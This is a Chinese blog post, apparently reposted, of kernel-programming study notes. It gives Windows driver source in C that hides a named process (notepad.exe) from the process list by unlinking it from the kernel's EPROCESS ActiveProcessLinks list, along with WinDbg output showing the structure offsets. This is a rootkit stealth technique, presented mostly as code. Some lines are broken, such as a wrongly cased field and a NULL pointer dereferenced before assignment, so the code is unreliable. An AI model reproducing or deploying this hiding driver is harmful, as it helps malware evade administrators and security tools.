ring0 进程隐藏实现

Posted HsinTsao

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ring0 进程隐藏实现相关的知识,希望对你有一定的参考价值。

最近在学习内核编程,记录一下最近的学习笔记。

原理:将当前进程从eprocess结构的链表中删除

无法被! process 0 0 看见 

#include "HideProcess.h"

#ifdef WIN64

#define ACTIVEPROCESSLINKS_EPROCESS  0x188
#define IMAGEFILENAME_EPROCESS       0x2e0    //16个字节组成的单字数组
#else

#define ACTIVEPROCESSLINKS_EPROCESS  0x088
#define IMAGEFILENAME_EPROCESS       0x174    //16个字节组成的单字数组

#endif

NTSTATUS
    DriverEntry(PDRIVER_OBJECT  DriverObject,PUNICODE_STRING  RegisterPath)
{
    PDEVICE_OBJECT  DeviceObject;
    NTSTATUS        Status;
    int             i = 0;

    UNICODE_STRING  DeviceName;
    UNICODE_STRING  LinkName;

    RtlInitUnicodeString(&DeviceName,DEVICE_NAME);
    RtlInitUnicodeString(&LinkName,LINK_NAME);

    //创建设备对象;

    Status = IoCreateDevice(DriverObject,0,
    &DeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,&DeviceObject);
    if (!NT_SUCCESS(Status))
    {
        return Status;
    }

    Status = IoCreateSymbolicLink(&LinkName,&DeviceName);

    for (i = 0; i<IRP_MJ_MAXIMUM_FUNCTION; i++)
    {
        DriverObject->MajorFunction[i] = DefaultPassThrough;
    }

    DriverObject->DriverUnload = UnloadDriver;

    if (HideProcess("notepad.exe") == FALSE)
    {
        DbgPrint("No Exist\r\n");
    }


#ifdef WIN64

    DbgPrint("WIN64: HideProcess IS RUNNING!!!");
#else

    DbgPrint("WIN32: HideProcess SIS RUNNING!!!");

#endif
    
    return STATUS_SUCCESS;
}

NTSTATUS
    DefaultPassThrough(PDEVICE_OBJECT  DeviceObject,PIRP Irp)
{
    Irp->iostatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp,IO_NO_INCREMENT);

    return STATUS_SUCCESS;
}

VOID
    UnloadDriver(PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING  LinkName;
    PDEVICE_OBJECT    NextDeviceObject    = NULL;
    PDEVICE_OBJECT  CurrentDeviceObject = NULL;
    RtlInitUnicodeString(&LinkName,LINK_NAME);

    IoDeleteSymbolicLink(&LinkName);
    CurrentDeviceObject = DriverObject->DeviceObject;
    while (CurrentDeviceObject != NULL) 
    {
    
        NextDeviceObject = CurrentDeviceObject->NextDevice;
        IoDeleteDevice(CurrentDeviceObject);
        CurrentDeviceObject = NextDeviceObject;
    }


    
    DbgPrint("HideProcess IS STOPPED!!!");
}

BOOLEAN HideProcess(char* ProcessImageName)
{
    //通过进程EProcess (ObjectHeader ObjectBody)
    /*
    kd> !process 0 0
    PROCESS fffffa8031ec9060
    SessionId: 1  Cid: 073c    Peb: 7fffffdf000  ParentCid: 06f8
    DirBase: 7fb21000  ObjectTable: fffff8a001ea3600  HandleCount: 545.
    Image: explorer.exe
    kd> dt _eprocess fffffa8031ec9060
    +0x000 Pcb              : _KPROCESS
    +0x160 ProcessLock      : _EX_PUSH_LOCK
    +0x168 CreateTime       : _LARGE_INTEGER 0x01d29b23`d17ef664
    +0x170 ExitTime         : _LARGE_INTEGER 0x0
    +0x178 RundownProtect   : _EX_RUNDOWN_REF
    +0x180 UniqueProcessId  : 0x00000000`0000073c Void
    +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31aeb1e8 - 0xfffffa80`3265da98 ]
    +0x198 ProcessQuotaUsage : [2] 0x3dc8
    kd> dt _LIST_ENTRY
    nt!_LIST_ENTRY
    +0x000 Flink            : Ptr64 _LIST_ENTRY    Next ListEntry
    +0x008 Blink            : Ptr64 _LIST_ENTRY    Previous

    kd> dt _eprocess 0xfffffa80`31aeb1e8-0x188
    nt!_EPROCESS
    +0x000 Pcb              : _KPROCESS
    +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31ec84d8 - 0xfffffa80`31ec91e8 ]
    +0x2e0 ImageFileName    : [15]  "vmtoolsd.exe"

    [空头][System][][][][Explorer][vmtoolsd]
    */
    PLIST_ENTRY  ListEntry = NULL;
    PEPROCESS  EProcess = NULL;
    PEPROCESS  v1 = NULL;
    PEPROCESS  EmptyEProcess = NULL;
    char*      ImageFileName = NULL;
    EProcess = PsGetCurrentProcess();
    if (EProcess == NULL)
    {
        return FALSE;
    }
    ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS);
    DbgPrint("CurrentImageFileName:%s\r\n", ImageFileName);
    v1 = EProcess;   //System.exe  EProcess
    //System.exe  的前一个 实际上是一个空头节点
    ListEntry = (PLIST_ENTRY)((UINT8*)EProcess + ACTIVEPROCESSLINKS_EPROCESS);  //0x188
    EmptyEProcess = (PEPROCESS)(((ULONG_PTR)(ListEntry->Blink)) - ACTIVEPROCESSLINKS_EPROCESS);

    ListEntry = NULL;
    while (v1 != EmptyEProcess)  //System!=空头节点
    {
        ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS);   //System.exe   Calc.exe
        //DbgPrint("ImageFileName:%s\r\n",szImageFileName);   
        ListEntry = (PLIST_ENTRY)((ULONG_PTR)v1 + ACTIVEPROCESSLINKS_EPROCESS);
        if (strstr(ImageFileName, ProcessImageName) != NULL)
        {
            if (ListEntry != NULL)
            {
                RemoveEntryList(ListEntry);
                break;
            }
        }
        v1 = (PEPROCESS)(((ULONG_PTR)(ListEntry->Flink)) - ACTIVEPROCESSLINKS_EPROCESS);  //Calc
    }
    return TRUE;
}

 

以上是关于ring0 进程隐藏实现的主要内容,如果未能解决你的问题,请参考以下文章

结束进程的N种方法(RING0 AND RING3)

结束进程的N种方法(RING0 AND RING3)

隐蔽的恶意代码启动

代码片段:Shell脚本实现重复执行和多进程

用VB实现隐藏进程

IRQL Ring0实现